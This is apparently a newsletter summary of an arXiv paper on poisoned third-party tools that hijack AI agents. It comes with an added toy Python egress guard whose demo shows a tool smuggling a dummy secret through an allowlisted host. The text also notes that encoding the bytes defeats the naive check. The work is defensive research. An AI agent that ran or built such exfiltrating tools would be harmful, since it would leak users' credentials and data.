The world is being quietly rearranged by people who write very long documents.


April 7, 2026
arXiv
The title they went with
ShieldNet: Network-Level Guardrails against Emerging Supply-Chain Injections in Agentic Systems
Noisy translates that to

AI agents can now be poisoned through their tool suppliers — and we can finally measure it


Researchers built a benchmark of over 10,000 malicious tools designed to hijack AI agents through their supply chain, then created a detection system that inspects the network traffic a tool produces at run time instead of scanning the tool's code. This means companies deploying AI agents can now test whether their defenses actually catch poisoned tools before those tools leak data or execute unauthorized commands.
Until now, AI agent security focused on the obvious attacks: bad prompts going in, unsafe outputs coming out. But as agents increasingly outsource work to third-party tools and tool servers, the real threat moved to the supply chain itself. A malicious tool looks benign until it executes; its code and description can pass review, and the telling evidence is in what it does once it runs, which is why watching its network traffic works where code scanning does not. The benchmark and detection system flip the asymmetry: defenders can now measure their own blindness. This matters because the cost of a poisoned tool in production is catastrophic (silent data exfiltration, unauthorized transactions, compromised decisions), and there was no way to test for it at scale before. One caveat to keep in mind: a monitor at the network boundary catches what leaves the host, so a poisoned tool that only misbehaves locally still needs process- and filesystem-level controls.
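To make the network-level idea concrete, here is an added illustration written for this summary; it is not code from the ShieldNet paper or its benchmark. A toy egress guard sits between an agent's tools and the network and never looks at a tool's code or description: it judges each outbound request by where it goes, whether the tool was granted write access, and whether the body carries bytes that a sensitive local tool returned earlier. The tool names, hosts, the secret value and the request sequence are all constructed for the example, and the three rules are a minimal policy of my own, not the paper's detector.

```python
"""Toy network-level guardrail for agent tool calls (added illustration,
not the ShieldNet implementation). Tool names, hosts and data are made up."""
from dataclasses import dataclass, field
from typing import Dict, List
from urllib.parse import urlsplit


@dataclass
class ToolPolicy:
    """What a registered tool is allowed to do on the network."""
    hosts: frozenset          # hosts this tool may contact
    may_write: bool = False   # may it use state-changing methods (POST/PUT/DELETE)?


@dataclass
class ToolRequest:
    """One outbound HTTP request the egress proxy observes a tool making."""
    tool: str
    method: str
    url: str
    body: bytes = b""


@dataclass
class Verdict:
    allowed: bool
    reasons: List[str] = field(default_factory=list)


class EgressGuard:
    """Judges traffic, not code: the tool's source and description are never consulted."""

    READ_ONLY = {"GET", "HEAD", "OPTIONS"}

    def __init__(self, policies: Dict[str, ToolPolicy], min_secret_len: int = 12):
        self.policies = policies
        self.min_secret_len = min_secret_len   # ignore short strings that match by chance
        self.secrets: Dict[str, bytes] = {}    # producing tool -> sensitive bytes

    def record_sensitive_output(self, tool: str, data: bytes) -> None:
        """Tag output of a sensitive local source (secret store, .env, DB dump).
        The proxy sees no network request for it; the agent runtime reports it."""
        if len(data) >= self.min_secret_len:
            self.secrets[tool] = data

    def check(self, req: ToolRequest) -> Verdict:
        policy = self.policies.get(req.tool, ToolPolicy(hosts=frozenset()))
        host = (urlsplit(req.url).hostname or "").lower()
        reasons: List[str] = []

        # Rule 1: a tool may only talk to the hosts it was registered for.
        if host not in policy.hosts:
            reasons.append(f"{req.tool}: destination {host!r} is not allowlisted")

        # Rule 2: state-changing methods need an explicit grant.
        if req.method.upper() not in self.READ_ONLY and not policy.may_write:
            reasons.append(f"{req.tool}: {req.method.upper()} not permitted for a read-only tool")

        # Rule 3: tagged sensitive output must not leave in any body, even to an
        # allowlisted host; this is the case a destination allowlist alone misses.
        for source, secret in self.secrets.items():
            if secret in req.body:
                reasons.append(f"{req.tool}: body carries sensitive output of {source!r}")

        return Verdict(allowed=not reasons, reasons=reasons)


# Constructed scenario: a benign weather tool, a third-party summariser, and a
# local .env reader whose output is the crown jewel. The secret is a dummy value.
SECRET = b"AWS_SECRET_ACCESS_KEY=EXAMPLE_SECRET_0123456789abcdef"


def run_demo() -> List[Verdict]:
    guard = EgressGuard({
        "weather": ToolPolicy(hosts=frozenset({"api.weather.example"})),
        "summarize_url": ToolPolicy(hosts=frozenset({"api.summarizer.example"}), may_write=True),
    })
    guard.record_sensitive_output("read_env", SECRET)

    requests = [
        # 1. honest weather lookup
        ToolRequest("weather", "GET", "https://api.weather.example/v1/current?q=Berlin"),
        # 2. honest summarisation of ordinary page text
        ToolRequest("summarize_url", "POST", "https://api.summarizer.example/summarize",
                    b'{"text": "Quarterly planning notes, nothing sensitive"}'),
        # 3. poisoned summariser: allowlisted host and method, but the body
        #    smuggles the secret out (a static scan of the tool sees nothing)
        ToolRequest("summarize_url", "POST", "https://api.summarizer.example/summarize",
                    b'{"text": "' + SECRET + b'"}'),
        # 4. poisoned weather tool: unknown host, write method, and the secret
        ToolRequest("weather", "POST", "https://collector.attacker.example/ingest", SECRET),
    ]
    return [guard.check(r) for r in requests]


if __name__ == "__main__":
    for i, v in enumerate(run_demo(), 1):
        print(i, "ALLOW" if v.allowed else "BLOCK", "; ".join(v.reasons))
```

Request 3 is the interesting one: the host is allowlisted, the method is permitted, and nothing in the tool's manifest would flag it, so only the tag on the sensitive output catches it. The substring match used here is deliberately naive; a real guard would have to decode common encodings (base64, chunked fields) or fall back to length and entropy signals, since an attacker controls how the bytes are wrapped.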
What happens next
Watch whether major AI agent platforms (Anthropic's Claude, OpenAI's) adopt network-level monitoring like ShieldNet, or whether they continue relying on tool scanning and semantic guardrails, which this paper reports miss more than 99% of its supply-chain attacks.

If you insist
Read the original →